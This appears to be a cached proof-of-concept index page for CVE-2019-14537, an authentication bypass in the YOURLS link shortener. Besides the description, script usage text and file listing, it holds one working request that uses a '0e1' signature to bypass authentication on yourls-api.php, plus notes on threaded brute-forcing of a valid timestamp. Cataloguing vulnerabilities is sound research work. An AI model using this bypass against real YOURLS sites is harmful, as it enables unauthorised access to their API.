CVE-2019-14537 PoC — YOURLS 授权问题漏洞

Source

https://github.com/Wocanilo/CVE-2019-14537

Associated Vulnerability

Title:YOURLS 授权问题漏洞 (CVE-2019-14537)
Description:YOURLS是一套基于PHP的开源短链接平台。 YOURLS 1.7.3及之前版本中存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。

Description

CVE-2019-14537  PoC

Readme

# YOURLS: CVE-2019-14537 PoC

![alt text](https://raw.githubusercontent.com/Wocanilo/CVE-2019-14537/master/poc_preview.png)

When you get a valid timestamp you will be able to make requests to the api. 

http://domain.com/yourls-api.php?signature=0e1&action=db-stats&timestamp=VALID_TIMESTAMP

## Usage

```
usage: main.py [-h] [--vhost VHOST] [--threads THREADS] [--path PATH]
               [--port PORT]
               [ip]

CVE-2019-14537 PoC

positional arguments:
  ip                 Yourls IP

optional arguments:
  -h, --help         show this help message and exit
  --vhost VHOST      host name (domain name)
  --threads THREADS  number of threads (default: 10)
  --path PATH        yourls-api.php path (default: /yourls-api.php)
  --port PORT        port (default: 80)
```

File Snapshot


 [4.0K]  /data/pocs/e275e01bc79987274a908c6e4cc62fca4dc7c39f
├── [2.5K]  main.py
├── [314K]  poc_preview.png
└── [ 785]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!